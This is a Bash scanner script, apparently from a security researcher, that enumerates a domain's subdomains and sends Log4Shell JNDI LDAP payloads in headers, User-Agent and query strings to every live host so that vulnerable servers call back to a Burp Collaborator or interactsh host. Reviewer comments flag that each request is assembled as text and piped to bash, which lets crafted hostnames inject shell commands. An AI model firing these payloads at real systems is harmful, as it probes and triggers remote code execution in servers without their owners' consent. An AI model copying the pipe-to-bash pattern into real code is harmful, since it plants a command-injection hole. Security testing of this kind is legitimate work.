#! /bin/bash
# :::'###::::'########::'####:'##::::::::'######:::'#######::'##:::'##:'########:::::'###::::'##:::::::'####:
# ::'## ##::: ##.... ##:. ##:: ##:::::::'##... ##:'##.... ##:. ##:'##:: ##.... ##:::'## ##::: ##:::::::. ##::
# :'##:. ##:: ##:::: ##:: ##:: ##::::::: ##:::..:: ##:::: ##::. ####::: ##:::: ##::'##:. ##:: ##:::::::: ##::
# :##:::. ##: ##:::: ##:: ##:: ##:::::::. ######:: ##:::: ##:::. ##:::: ########::'##:::. ##: ##:::::::: ##::
# :#########: ##:::: ##:: ##:: ##::::::::..... ##: ##:::: ##:::: ##:::: ##.... ##: #########: ##:::::::: ##::
# :##.... ##: ##:::: ##:: ##:: ##:::::::'##::: ##: ##:::: ##:::: ##:::: ##:::: ##: ##.... ##: ##:::::::: ##::
# :##:::: ##: ########::'####: ########:. ######::. #######::::: ##:::: ########:: ##:::: ##: ########:'####:
# :.:::::..::........:::....::........:::......::::.......::::::..:::::........:::..:::::..::........::....::
# 01000001 01100100 01101001 01101100 01110011 01101111 01111001 01100010 01100001 01101100 01101001
# https://github.com/adilsoybali
# https://adilsoybali.com
# https://seccops.com
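#######################################
# Prints the usage text to stdout, coloured green when a terminal is available.
# Globals:   none ($0 is used for the script name)
# Arguments: none
# Outputs:   usage text on stdout
# Returns:   0
#######################################
showHelp() {
  local green reset
  # tput writes "No value for $TERM" to stderr and fails when TERM is unset or
  # the script is run from cron/CI; fall back to plain text instead of leaking
  # that message into the help output.
  green=$(tput setaf 2 2>/dev/null) || green=
  reset=$(tput sgr0 2>/dev/null) || reset=
  cat << EOF
${green}
Usage:
$0 -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
$0 -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
-h, --help Display help
-l, --url-list List of domain/subdomain/ip to be used for scanning.
-d, --domain The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid Burp collabrator client id address or interactsh domain address.
${reset}
EOF
}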
#######################################
# Enumerates subdomains of $domain (subfinder, assetfinder, amass), appends
# them to ./sub.$domain, probes the live hosts with httpx and sends the three
# test requests (header, query string, User-Agent) to each one.
# Globals:   domain (read), burpcollabid (read)
# Arguments: none
# Outputs:   progress banners and a per-host summary on stdout; ./sub.$domain
#            is created or appended to in the current directory
# Returns:   status of the final pipeline
#######################################
domainScan() {
# NOTE(review): subfinder is pointed at `sub.$domain` while assetfinder and amass
# get `$domain`; this looks like a typo for `-d $domain` -- confirm. `$domain`
# is unquoted throughout, `>>` means reruns accumulate earlier results, `read`
# has no -r, and the while loop runs in a pipeline subshell.
echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Subfinder is working $(tput sgr0)\n" ; subfinder -silent -d sub.$domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Assetfinder is working $(tput sgr0)\n" ; assetfinder -subs-only $domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Amass is working $(tput sgr0)\n" ; amass enum -norecursive --silent -noalts -d $domain >> sub.$domain ; cat sub.$domain | sort -u | httpx -silent | while read url; do
# NOTE(review): each request is assembled as text, patched with sed and piped to
# bash, so the host string returned by httpx ends up inside a command line that
# bash executes: a name containing `|` breaks the sed expression and any shell
# metacharacters in it would be interpreted. Invoking curl directly with quoted
# arguments would avoid that.
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
# Here $url sits outside the single quotes, so the outer shell expands it before
# echo runs; the trailing sed that substitutes `$url` is a no-op for this line.
echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
# Per-host summary; `echo -e` and the \033 escapes are bash/ANSI specific.
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
#######################################
# Reads targets from the file named in $list, de-duplicates them, probes the
# live hosts with httpx and sends the three test requests (header, query
# string, User-Agent) to each one.
# Globals:   list (read), burpcollabid (read)
# Arguments: none
# Outputs:   per-host summary on stdout
# Returns:   status of the final pipeline
#######################################
listScan() {
# NOTE(review): `$list` is unquoted (a path with spaces splits), `cat | sort`
# could be `sort -u -- "$list"`, `read` has no -r, and the loop body runs in a
# pipeline subshell. A missing file only produces a cat error and an empty scan.
cat $list | sort -u | httpx -silent | while read url; do
# NOTE(review): each request is assembled as text, patched with sed and piped to
# bash, so the host string from the input file/httpx ends up inside a command
# line that bash executes: a name containing `|` breaks the sed expression and
# any shell metacharacters in it would be interpreted. Invoking curl directly
# with quoted arguments would avoid that.
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
# Here $url sits outside the single quotes, so the outer shell expands it before
# echo runs; the trailing sed that substitutes `$url` is a no-op for this line.
echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
# Per-host summary; `echo -e` and the \033 escapes are bash/ANSI specific.
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
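# Command-line handling. Accepts -l/--url-list FILE or -d/--domain NAME together
# with -b/--burpcollabid ID (in either order, so the documented `-l FILE -b ID`
# form still works), plus -h/--help; `--` ends option parsing. Exactly one scan
# mode is run; every other combination prints the help.
# Fixes: -h/--help is now a real option rather than falling into the catch-all;
# an empty or missing option value no longer silently scans nothing; usage
# errors exit 2 instead of 0 so a caller can tell them from a completed scan.
list= domain= burpcollabid=
while [[ "${1-}" =~ ^- && "${1-}" != "--" ]]; do
  case "$1" in
    -h | --help )
      showHelp
      exit 0
      ;;
    -l | --url-list )
      # listScan reads this file; fail early if it is missing or unreadable.
      [[ -n "${2-}" && -r "$2" ]] || { showHelp; exit 2; }
      list="$2"
      shift
      ;;
    -d | --domain )
      [[ -n "${2-}" ]] || { showHelp; exit 2; }
      domain="$2"
      shift
      ;;
    -b | --burpcollabid )
      [[ -n "${2-}" ]] || { showHelp; exit 2; }
      burpcollabid="$2"
      shift
      ;;
    *)
      # Unknown option: help text still goes to stdout, but the status is non-zero.
      showHelp
      exit 2
      ;;
  esac
  shift
done
[[ "${1-}" == "--" ]] && shift

# Dispatch: a target (list or domain) and a collaborator id are both required.
# If both a list and a domain were given, the list wins. `exit` without an
# argument propagates the scan function's status, as the original did.
if [[ -n "$list" && -n "$burpcollabid" ]]; then
  listScan
  exit
elif [[ -n "$domain" && -n "$burpcollabid" ]]; then
  domainScan
  exit
else
  showHelp
  exit 2
fi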
# tested 1
# echo 'curl -s $url -H 'log4jPayload'' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
# tested 2
# echo 'curl -s '$url/?test=log4jPayload'' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
# tested 3
# echo 'curl -s $url -H 'log4jPayload'' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash